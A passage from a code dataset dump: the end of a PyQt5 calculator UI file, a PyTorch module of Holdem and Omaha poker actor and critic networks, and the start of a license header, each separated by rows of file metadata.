palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 115, 43))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 70, 70))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 31, 31))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(112, 120, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 52, 52))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(81, 111, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 25, 25))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(81, 111, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 24, 8))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.HighlightedText, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 27, 27))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(209, 222, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.NoRole, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 47, 47))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.three.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.three.setFont(font)
self.three.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.three.setIconSize(QtCore.QSize(20, 20))
self.three.setShortcut("")
self.three.setCheckable(False)
self.three.setObjectName("three")
self.verticalLayout_4.addWidget(self.three)
self.virgul = QtWidgets.QPushButton(Form)
self.virgul.setMinimumSize(QtCore.QSize(0, 0))
self.virgul.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.virgul.setFont(font)
self.virgul.setIconSize(QtCore.QSize(20, 20))
self.virgul.setShortcut("")
self.virgul.setCheckable(False)
self.virgul.setObjectName("virgul")
self.verticalLayout_4.addWidget(self.virgul)
self.horizontalLayout.addLayout(self.verticalLayout_4)
self.verticalLayout_7 = QtWidgets.QVBoxLayout()
self.verticalLayout_7.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.verticalLayout_7.setSpacing(0)
self.verticalLayout_7.setObjectName("verticalLayout_7")
self.bolme = QtWidgets.QPushButton(Form)
self.bolme.setEnabled(True)
self.bolme.setMinimumSize(QtCore.QSize(0, 0))
self.bolme.setMaximumSize(QtCore.QSize(16777215, 68))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 21, 21))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 21, 21))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 21, 21))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
self.bolme.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.bolme.setFont(font)
self.bolme.setIconSize(QtCore.QSize(20, 20))
self.bolme.setShortcut("")
self.bolme.setCheckable(False)
self.bolme.setObjectName("bolme")
self.verticalLayout_7.addWidget(self.bolme)
self.carpma = QtWidgets.QPushButton(Form)
self.carpma.setEnabled(True)
self.carpma.setMinimumSize(QtCore.QSize(0, 0))
self.carpma.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.carpma.setFont(font)
self.carpma.setStyleSheet("")
self.carpma.setIconSize(QtCore.QSize(20, 20))
self.carpma.setShortcut("")
self.carpma.setCheckable(False)
self.carpma.setObjectName("carpma")
self.verticalLayout_7.addWidget(self.carpma)
self.cikarma = QtWidgets.QPushButton(Form)
self.cikarma.setMinimumSize(QtCore.QSize(0, 0))
self.cikarma.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.cikarma.setFont(font)
self.cikarma.setIconSize(QtCore.QSize(20, 20))
self.cikarma.setShortcut("")
self.cikarma.setCheckable(False)
self.cikarma.setObjectName("cikarma")
self.verticalLayout_7.addWidget(self.cikarma)
self.toplama = QtWidgets.QPushButton(Form)
self.toplama.setMinimumSize(QtCore.QSize(0, 0))
self.toplama.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.toplama.setFont(font)
self.toplama.setIconSize(QtCore.QSize(20, 20))
self.toplama.setShortcut("")
self.toplama.setCheckable(False)
self.toplama.setObjectName("toplama")
self.verticalLayout_7.addWidget(self.toplama)
self.esittir = QtWidgets.QPushButton(Form)
self.esittir.setMinimumSize(QtCore.QSize(0, 0))
self.esittir.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.esittir.setFont(font)
self.esittir.setIconSize(QtCore.QSize(20, 20))
self.esittir.setShortcut("")
self.esittir.setCheckable(False)
self.esittir.setObjectName("esittir")
self.verticalLayout_7.addWidget(self.esittir)
self.horizontalLayout.addLayout(self.verticalLayout_7)
self.verticalLayout_5.addLayout(self.horizontalLayout)
self.verticalLayout.addLayout(self.verticalLayout_5)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "CalculatorOne (3.7)"))
self.writing_area.setToolTip(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:37pt; font-weight:400; font-style:normal;\">\n"
"<p align=\"right\" dir=\'rtl\' style=\"-qt-paragraph-type:empty; margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>"))
self.clear_line.setText(_translate("Form", "CE"))
self.seven.setText(_translate("Form", "7"))
self.four.setText(_translate("Form", "4"))
self.one.setText(_translate("Form", "1"))
self.arti_eksi.setText(_translate("Form", "+-"))
self.clear_all.setText(_translate("Form", "C"))
self.eight.setText(_translate("Form", "8"))
self.five.setText(_translate("Form", "5"))
self.two.setText(_translate("Form", "2"))
self.zero.setText(_translate("Form", "0"))
self.back.setText(_translate("Form", "↵"))
self.nine.setText(_translate("Form", "9"))
self.six.setText(_translate("Form", "6"))
self.three.setToolTip(_translate("Form", "<html><head/><body><p>ddd</p></body></html>"))
self.three.setText(_translate("Form", "3"))
self.virgul.setText(_translate("Form", "."))
self.bolme.setText(_translate("Form", "÷"))
self.carpma.setText(_translate("Form", "x"))
self.cikarma.setText(_translate("Form", "-"))
self.toplama.setText(_translate("Form", "+"))
self.esittir.setText(_translate("Form", "="))
| 53.919569 | 204 | 0.683516 | 7,565 | 65,027 | 5.857237 | 0.042829 | 0.140239 | 0.084496 | 0.1109 | 0.842316 | 0.820853 | 0.789348 | 0.782848 | 0.781223 | 0.781223 | 0 | 0.046857 | 0.190336 | 65,027 | 1,205 | 205 | 53.964315 | 0.794701 | 0.003706 | 0 | 0.732607 | 1 | 0 | 0.023866 | 0.005187 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001676 | false | 0 | 0.000838 | 0 | 0.003353 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6cf8eb813884f44ad603adab7611de76c34460ee | 21,605 | py | Python | poker/models/networks.py | MorGriffiths/PokerAI | a68400f4918f10dde82574ad19654243c9a65024 | [
"MIT"
] | 2 | 2020-05-24T12:21:36.000Z | 2022-02-08T03:02:17.000Z | poker/models/networks.py | MorGriffiths/PokerAI | a68400f4918f10dde82574ad19654243c9a65024 | [
"MIT"
] | 3 | 2017-04-28T00:25:18.000Z | 2018-03-18T20:51:20.000Z | poker/models/networks.py | C5ipo7i/PokerAI | a68400f4918f10dde82574ad19654243c9a65024 | [
"MIT"
] | 2 | 2020-11-05T11:57:04.000Z | 2021-03-17T17:57:24.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from torch.distributions import Categorical
from poker_env.datatypes import Action
from models.model_utils import padding_index,count_parameters
from models.buffers import PriorityReplayBuffer,PriorityTree
from models.model_layers import EncoderAttention,VectorAttention,Embedder,GaussianNoise,PreProcessLayer,CTransformer,NetworkFunctions,IdentityBlock
from models.model_utils import mask_,hard_update,combined_masks,norm_frequencies,strip_padding,copy_weights
class BetAgent(object):
def __init__(self):
pass
def name(self):
return 'baseline_evaluation'
def __call__(self,state,action_mask,betsize_mask,target=False):
if betsize_mask.sum() > 0:
action = np.argmax(betsize_mask,axis=-1) + 3
else:
action = np.argmax(action_mask,axis=-1)
actor_outputs = {
'action':action,
'action_category':int(np.where(action_mask > 0)[-1][-1]),
'action_probs':torch.zeros(5).fill_(2.),
'action_prob':torch.tensor([1.]),
'betsize' : int(np.argmax(betsize_mask,axis=-1))
}
return actor_outputs
################################################
# Holdem Networks #
################################################
class Network(nn.Module):
def __init__(self):
super().__init__()
@property
def summary(self):
count_parameters(self)
class HoldemBaseline(Network):
def __init__(self,seed,nS,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nS = nS
self.nA = nA
self.nB = nB
self.combined_output = nA - 2 + nB
self.helper_functions = NetworkFunctions(self.nA,self.nB)
self.maxlen = params['maxlen']
self.process_input = PreProcessLayer(params)
# self.seed = torch.manual_seed(seed)
self.mapping = params['mapping']
self.hand_emb = Embedder(5,64)
self.action_emb = Embedder(6,64)
self.betsize_emb = Embedder(self.nB,64)
self.noise = GaussianNoise()
self.emb = 1248
n_heads = 8
depth = 2
self.lstm = nn.LSTM(self.emb, 128)
# self.transformer = CTransformer(emb,n_heads,depth,self.max_length,self.nA)
self.fc1 = nn.Linear(528,hidden_dims[0])
self.fc2 = nn.Linear(hidden_dims[0],hidden_dims[1])
self.fc3 = nn.Linear(1280,self.combined_output)
self.dropout = nn.Dropout(0.5)
def forward(self,state,action_mask,betsize_mask):
mask = combined_masks(action_mask,betsize_mask)
x = state
if x.dim() == 2:
x = x.unsqueeze(0)
out = self.process_input(x).unsqueeze(0)
B,M,c = out.size()
n_padding = max(self.maxlen - M,0)
padding = torch.zeros(B,n_padding,out.size(-1))
h = torch.cat((out,padding),dim=1)
lstm_out,_ = self.lstm(h)
t_logits = self.fc3(lstm_out.view(-1))
category_logits = self.noise(t_logits)
action_soft = F.softmax(category_logits,dim=-1)
action_probs = norm_frequencies(action_soft,mask)
m = Categorical(action_probs)
action = m.sample()
action_category,betsize_category = self.helper_functions.unwrap_action(action,state[:,-1,self.mapping['state']['previous_action']])
outputs = {
'action':action,
'action_category':action_category,
'action_prob':m.log_prob(action),
'action_probs':action_probs,
'betsize':betsize_category
}
return outputs
class HoldemBaselineCritic(Network):
def __init__(self,seed,nO,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nO = nO
self.nA = nA
# self.seed = torch.manual_seed(seed)
self.mapping = params['mapping']
self.process_input = PreProcessLayer(params,critic=True)
self.fc1 = nn.Linear(304,hidden_dims[0])
self.fc2 = nn.Linear(hidden_dims[0],hidden_dims[1])
self.fc3 = nn.Linear(hidden_dims[1],nA)
self.dropout = nn.Dropout(0.5)
self.value_output = nn.Linear(64,1)
self.advantage_output = nn.Linear(64,self.nA)
def forward(self,x,action):
M,c = x.size()
ranks = x[:,self.mapping['observation']['rank']].long()
suits = x[:,self.mapping['observation']['suit']].long()
vil_rank = x[:,self.mapping['observation']['vil_ranks']].long()
vil_suit = x[:,self.mapping['observation']['vil_suits']].long()
board_ranks = x[:,self.mapping['observation']['board_ranks']].long()
board_suits = x[:,self.mapping['observation']['board_suits']].long()
rank_input = torch.cat((ranks,board_ranks),dim=-1)
suit_input = torch.cat((suits,board_suits),dim=-1)
hot_ranks = self.one_hot_ranks[rank_input]
hot_suits = self.one_hot_suits[suit_input]
s = self.suit_conv(hot_suits.float())
r = self.rank_conv(hot_ranks.float())
hero = torch.cat((r,s),dim=-1)
rank_input2 = torch.cat((vil_rank,board_ranks),dim=-1)
suit_input2 = torch.cat((vil_suit,board_suits),dim=-1)
hot_ranks2 = self.one_hot_ranks[rank_input2]
hot_suits2 = self.one_hot_suits[suit_input2]
s2 = self.suit_conv(hot_suits2.float())
r2 = self.rank_conv(hot_ranks2.float())
villain = torch.cat((r2,s2),dim=-1)
# should be (b,64,88)
winner = hero - villain
last_action = x[:,self.mapping['observation']['previous_action']].long()
last_action = self.action_emb(last_action)
x = torch.cat([winner.view(M,-1),last_action],dim=-1)
x = self.activation(self.fc1(x))
x = self.activation(self.fc2(x))
outputs = {
'value':torch.tanh(self.fc3(x))
}
return outputs
class HoldemQCritic(Network):
def __init__(self,seed,nO,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nO = nO
self.nA = nA
self.process_input = PreProcessLayer(params)
self.maxlen = params['maxlen']
self.mapping = params['mapping']
emb = 1248
n_heads = 8
depth = 2
self.transformer = CTransformer(emb,n_heads,depth,self.maxlen,self.nA)
self.dropout = nn.Dropout(0.5)
self.value_output = nn.Linear(5,1)
self.advantage_output = nn.Linear(5,self.nA)
def forward(self,state):
x = state
if x.ndim == 2:
x = x.unsqueeze(0)
out = self.process_input(x).unsqueeze(0)
B,M,c = out.size()
q_input = self.transformer(out)
a = self.advantage_output(q_input)
v = self.value_output(q_input)
v = v.expand_as(a)
q = v + a - a.mean(-1,keepdim=True).expand_as(a)
outputs = {
'value':q.squeeze(0)
}
return outputs
################################################
# Omaha Networks #
################################################
class OmahaBatchActor(Network):
def __init__(self,seed,nS,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nS = nS
self.nA = nA
self.nB = nB
self.combined_output = nA - 2 + nB
self.helper_functions = NetworkFunctions(self.nA,self.nB)
self.maxlen = params['maxlen']
self.device = params['device']
self.process_input = PreProcessLayer(params)
# self.seed = torch.manual_seed(seed)
self.state_mapping = params['state_mapping']
self.hand_emb = Embedder(5,64)
self.action_emb = Embedder(Action.UNOPENED,64)
self.betsize_emb = Embedder(self.nB,64)
self.noise = GaussianNoise(self.device)
self.emb = 1248
n_heads = 8
depth = 2
self.lstm = nn.LSTM(1280, 128,bidirectional=True)
self.batchnorm = nn.BatchNorm1d(self.maxlen)
# self.blocks = nn.Sequential(
# IdentityBlock(hidden_dims=(2560,2560,512),activation=F.leaky_relu),
# IdentityBlock(hidden_dims=(512,512,256),activation=F.leaky_relu),
# )
self.fc_final = nn.Linear(2560,self.combined_output)
self.dropout = nn.Dropout(0.5)
def forward(self,state,action_mask,betsize_mask):
x = torch.tensor(state,dtype=torch.float32).to(self.device)
action_mask = torch.tensor(action_mask,dtype=torch.float).to(self.device)
betsize_mask = torch.tensor(betsize_mask,dtype=torch.float).to(self.device)
mask = combined_masks(action_mask,betsize_mask)
out = self.process_input(x)
B,M,c = out.size()
n_padding = self.maxlen - M
if n_padding < 0:
h = out[:,-self.maxlen:,:]
else:
padding = torch.zeros(B,n_padding,out.size(-1)).to(self.device)
h = torch.cat((out,padding),dim=1)
lstm_out,_ = self.lstm(h)
norm = self.batchnorm(lstm_out)
# blocks_out = self.blocks(lstm_out.view(-1))
t_logits = self.fc_final(norm.view(-1))
category_logits = self.noise(t_logits)
action_soft = F.softmax(category_logits,dim=-1)
action_probs = norm_frequencies(action_soft,mask)
m = Categorical(action_probs)
action = m.sample()
action_category,betsize_category = self.helper_functions.unwrap_action(action,state[:,-1,self.state_mapping['last_action']])
outputs = {
'action':action.item(),
'action_category':action_category.item(),
'action_prob':m.log_prob(action),
'action_probs':action_probs,
'betsize':betsize_category.item()
}
return outputs
class OmahaBatchObsQCritic(Network):
def __init__(self,seed,nO,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nO = nO
self.nA = nA
self.combined_output = nA - 2 + nB
self.process_input = PreProcessLayer(params,critic=True)
self.maxlen = params['maxlen']
self.mapping = params['state_mapping']
self.device = params['device']
# self.emb = params['embedding_size']
# self.lstm = nn.LSTM(1280, 128)
emb = params['transformer_in']
n_heads = 8
depth = 2
self.transformer = CTransformer(emb,n_heads,depth,self.maxlen,params['transformer_out'])
self.dropout = nn.Dropout(0.5)
self.value_output = nn.Linear(params['transformer_out'],1)
self.advantage_output = nn.Linear(params['transformer_out'],self.combined_output)
def forward(self,obs):
x = torch.tensor(obs,dtype=torch.float32).to(self.device)
out = self.process_input(x)
q_input = self.transformer(out)
a = self.advantage_output(q_input)
v = self.value_output(q_input)
v = v.expand_as(a)
q = v + a - a.mean(-1,keepdim=True).expand_as(a)
outputs = {
'value':q.squeeze(0)
}
return outputs
class OmahaActor(Network):
def __init__(self,seed,nS,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nS = nS
self.nA = nA
self.nB = nB
self.combined_output = nA - 2 + nB
self.helper_functions = NetworkFunctions(self.nA,self.nB)
self.maxlen = params['maxlen']
self.device = params['device']
self.epsilon = params['epsilon']
self.epsilon_weights = params['epsilon_weights'].to(self.device)
self.process_input = PreProcessLayer(params)
# self.seed = torch.manual_seed(seed)
self.state_mapping = params['state_mapping']
self.action_emb = Embedder(Action.UNOPENED,64)
self.betsize_emb = Embedder(self.nB,64)
self.noise = GaussianNoise(self.device)
self.emb = 1248
n_heads = 8
depth = 2
# self.attention = EncoderAttention(params['lstm_in'],params['lstm_out'])
self.lstm = nn.LSTM(params['lstm_in'],params['lstm_out'],bidirectional=True)
self.batchnorm = nn.BatchNorm1d(self.maxlen)
# self.blocks = nn.Sequential(
# IdentityBlock(hidden_dims=(2560,2560,512),activation=F.leaky_relu),
# IdentityBlock(hidden_dims=(512,512,256),activation=F.leaky_relu),
# )
self.fc_final = nn.Linear(5120,self.combined_output)
def set_device(self,device):
self.device = device
self.process_input.set_device(device)
def forward(self,state,action_mask,betsize_mask,target=False):
"""
state: B,M,39
"""
if not isinstance(state,torch.Tensor):
state = torch.tensor(state,dtype=torch.float32).to(self.device)
action_mask = torch.tensor(action_mask,dtype=torch.float32).to(self.device)
betsize_mask = torch.tensor(betsize_mask,dtype=torch.float32).to(self.device)
mask = combined_masks(action_mask,betsize_mask)
if target and np.random.random() < self.epsilon:
B = state.size(0)
# pick random legal move
action_masked = self.epsilon_weights * mask
action_probs = action_masked / action_masked.sum(-1).unsqueeze(-1)
action = action_probs.multinomial(num_samples=1, replacement=False)
action_prob = torch.zeros(B,1)
else:
out = self.process_input(state)
B,M,c = state.size()
n_padding = self.maxlen - M
if n_padding < 0:
h = out[:,-self.maxlen:,:]
else:
padding = torch.zeros(B,n_padding,out.size(-1)).to(self.device)
h = torch.cat((padding,out),dim=1)
lstm_out,hidden_states = self.lstm(h)
norm = self.batchnorm(lstm_out)
# self.attention(out)
# blocks_out = self.blocks(lstm_out.view(-1))
t_logits = self.fc_final(norm.view(B,-1))
category_logits = self.noise(t_logits)
# skip connection
# category_logits += h
action_soft = F.softmax(category_logits,dim=-1)
action_probs = norm_frequencies(action_soft,mask)
m = Categorical(action_probs)
action = m.sample()
action_prob = m.log_prob(action)
previous_action = torch.as_tensor(state[:,-1,self.state_mapping['last_action']]).to(self.device)
action_category,betsize_category = self.helper_functions.batch_unwrap_action(action,previous_action)
if B > 1:
# batch training
outputs = {
'action':action,
'action_category':action_category,
'action_prob':action_prob,
'action_probs':action_probs,
'betsize':betsize_category
}
else:
# playing hand
outputs = {
'action':action.item(),
'action_category':action_category.item(),
'action_prob':action_prob,
'action_probs':action_probs,
'betsize':betsize_category.item()
}
return outputs
class OmahaQCritic(Network):
def __init__(self,seed,nO,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nO = nO
self.nA = nA
self.combined_output = nA - 2 + nB
self.process_input = PreProcessLayer(params)
self.maxlen = params['maxlen']
self.mapping = params['state_mapping']
self.device = params['device']
# self.emb = params['embedding_size']
# self.lstm = nn.LSTM(1280, 128)
emb = params['transformer_in']
n_heads = 8
depth = 2
self.transformer = CTransformer(emb,n_heads,depth,self.maxlen,params['transformer_out'])
self.dropout = nn.Dropout(0.5)
self.value_output = nn.Linear(params['transformer_out'],1)
self.advantage_output = nn.Linear(params['transformer_out'],self.combined_output)
def set_device(self,device):
self.device = device
self.process_input.set_device(device)
def forward(self,state):
x = torch.tensor(state,dtype=torch.float32).to(self.device)
out = self.process_input(x)
# B,M,c = out.size()
# n_padding = max(self.maxlen - M,0)
# padding = torch.zeros(B,n_padding,out.size(-1))
# h = torch.cat((out,padding),dim=1)
q_input = self.transformer(out)
a = self.advantage_output(q_input)
v = self.value_output(q_input)
v = v.expand_as(a)
q = v + a - a.mean(-1,keepdim=True).expand_as(a)
outputs = {
'value':q.squeeze(0)
}
return outputs
class OmahaObsQCritic(Network):
def __init__(self,seed,nO,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nO = nO
self.nA = nA
self.combined_output = nA - 2 + nB
# self.attention = VectorAttention(params['transformer_in'])
self.process_input = PreProcessLayer(params,critic=True)
self.maxlen = params['maxlen']
self.mapping = params['state_mapping']
self.device = params['device']
# self.emb = params['embedding_size']
emb = params['transformer_in']
n_heads = 8
depth = 2
self.transformer = CTransformer(emb,n_heads,depth,self.maxlen,params['transformer_out'])
self.dropout = nn.Dropout(0.5)
self.value_output = nn.Linear(params['transformer_out'],1)
self.advantage_output = nn.Linear(params['transformer_out'],self.combined_output)
def set_device(self,device):
self.device = device
self.process_input.set_device(device)
def forward(self,obs):
if not isinstance(obs,torch.Tensor):
obs = torch.tensor(obs,dtype=torch.float32).to(self.device)
out = self.process_input(obs)
# context = self.attention(out)
q_input = self.transformer(out)
a = self.advantage_output(q_input)
v = self.value_output(q_input)
v = v.expand_as(a)
q = v + a - a.mean(-1,keepdim=True).expand_as(a)
outputs = {
'value':q.squeeze(0)
}
return outputs
class CombinedNet(Network):
def __init__(self,seed,nO,nA,nB,params,hidden_dims=(64,64),activation=F.leaky_relu):
super().__init__()
self.activation = activation
self.nO = nO
self.nA = nA
self.nB = nB
self.combined_output = nA - 2 + nB
self.maxlen = params['maxlen']
self.mapping = params['state_mapping']
self.device = params['device']
# self.emb = params['embedding_size']
self.helper_functions = NetworkFunctions(self.nA,self.nB)
self.process_input = PreProcessLayer(params)
self.lstm = nn.LSTM(1280, 128)
self.policy_out = nn.Linear(1280,self.combined_output)
self.noise = GaussianNoise(self.device)
emb = params['transformer_in']
n_heads = 8
depth = 2
self.transformer = CTransformer(emb,n_heads,depth,self.maxlen,params['transformer_out'])
self.dropout = nn.Dropout(0.5)
self.value_output = nn.Linear(params['transformer_out'],1)
self.advantage_output = nn.Linear(params['transformer_out'],self.combined_output)
def forward(self,state,action_mask,betsize_mask):
x = torch.tensor(state,dtype=torch.float32).to(self.device)
action_mask = torch.tensor(action_mask,dtype=torch.float).to(self.device)
betsize_mask = torch.tensor(betsize_mask,dtype=torch.float).to(self.device)
mask = combined_masks(action_mask,betsize_mask)
out = self.process_input(x)
# Actor
B,M,c = out.size()
n_padding = self.maxlen - M
if n_padding < 0:
h = out[:,-self.maxlen:,:]
else:
padding = torch.zeros(B,n_padding,out.size(-1)).to(self.device)
h = torch.cat((out,padding),dim=1)
lstm_out,_ = self.lstm(h)
t_logits = self.policy_out(lstm_out.view(-1))
category_logits = self.noise(t_logits)
action_soft = F.softmax(category_logits,dim=-1)
action_probs = norm_frequencies(action_soft,mask)
m = Categorical(action_probs)
action = m.sample()
action_category,betsize_category = self.helper_functions.unwrap_action(action,state[:,-1,self.mapping['last_action']])
outputs = {
'action':action.item(),
'action_category':action_category.item(),
'action_prob':m.log_prob(action),
'action_probs':action_probs,
'betsize':betsize_category.item()
}
# Critic
q_input = self.transformer(out)
a = self.advantage_output(q_input)
v = self.value_output(q_input)
v = v.expand_as(a)
q = v + a - a.mean(-1,keepdim=True).expand_as(a)
outputs['value'] = q.squeeze(0)
return outputs | 39.935305 | 147 | 0.604166 | 2,696 | 21,605 | 4.646884 | 0.089763 | 0.025543 | 0.025543 | 0.020754 | 0.806992 | 0.768678 | 0.753033 | 0.733637 | 0.715597 | 0.704342 | 0 | 0.021182 | 0.261421 | 21,605 | 541 | 148 | 39.935305 | 0.763928 | 0.064985 | 0 | 0.701794 | 0 | 0 | 0.050336 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058296 | false | 0.002242 | 0.022422 | 0.002242 | 0.130045 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9f544a61164f2e6c40e09f35ddb0ae3a30a89eeb | 7,890 | py | Python | dialogue-engine/test/programytest/config/brain/test_security.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 104 | 2020-03-30T09:40:00.000Z | 2022-03-06T22:34:25.000Z | dialogue-engine/test/programytest/config/brain/test_security.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 25 | 2020-06-12T01:36:35.000Z | 2022-02-19T07:30:44.000Z | dialogue-engine/test/programytest/config/brain/test_security.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 10 | 2020-04-02T23:43:56.000Z | 2021-05-14T13:47:01.000Z | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
